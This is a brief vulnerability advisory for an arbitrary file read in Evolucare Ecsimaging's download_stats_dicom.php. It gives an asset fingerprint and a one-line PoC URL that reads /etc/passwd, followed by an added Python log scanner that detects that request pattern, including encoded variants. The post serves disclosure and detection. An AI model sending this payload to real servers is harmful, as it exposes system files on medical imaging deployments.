Evolucare Ecsimaging download_stats_dicom.php Arbitrary File Read Vulnerability
Vulnerability Description
The download_stats_dicom.php script in Evolucare Ecsimaging has an arbitrary file read vulnerability, which an attacker can use to obtain sensitive system information.
Affected Version
EVOLUCARE Evolucare Ecsimaging 6.21.5
Network Asset Fingerprint
body="ECSimaging"
Vulnerability Reproduction
Login page
Verification PoC
/download_stats_dicom.php?fullpath=/etc/passwd&filename=/etc/passwd
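A log-side check for the request pattern shown in the PoC above, as an added example that is not part of the original post or of the vendor's code. It assumes a combined-format web access log; the list of sensitive prefixes and the sample log lines are constructed for illustration.

```python
import re
from posixpath import normpath
from urllib.parse import parse_qs, unquote, urlsplit

# Client IP, request target and status from a combined-format access log line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
ENDPOINT = "/download_stats_dicom.php"  # script named in the advisory
PARAMS = ("fullpath", "filename")       # parameters used in the advisory's PoC
# Assumption: locations a statistics download never needs to read.
SENSITIVE = ("/etc/", "/proc/", "/root/", "/home/", "/var/log/")

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so %252F and %2F both compare as '/'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_path(value):
    """True for parent-directory references or paths under a sensitive prefix."""
    path = re.sub(r"^/+", "/", fully_decode(value))  # collapse leading '//'
    return ".." in path.split("/") or (normpath(path) + "/").startswith(SENSITIVE)

def scan(lines):
    """Return (client_ip, status, parameter, decoded_value) per suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        url = urlsplit(m.group(2)) if m else None
        if url is None or not url.path.endswith(ENDPOINT):
            continue
        for name, values in parse_qs(url.query).items():
            hits += [(m.group(1), int(m.group(3)), name, fully_decode(v))
                     for v in values if name in PARAMS and suspicious_path(v)]
    return hits

SAMPLE_LOG = [  # constructed lines for the example, not from a real system
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /download_stats_dicom.php?fullpath=/etc/passwd&filename=/etc/passwd HTTP/1.1" 200 1843',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /download_stats_dicom.php?fullpath=%252Fetc%252Fpasswd&filename=passwd HTTP/1.1" 200 1843',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /download_stats_dicom.php?fullpath=stats/2024-01.csv&filename=2024-01.csv HTTP/1.1" 200 512',
    '198.51.100.8 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A hit with status 200 and a non-trivial response size is the case to triage first, since it suggests the file content was returned.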
This post is licensed under CC BY 4.0 by the author.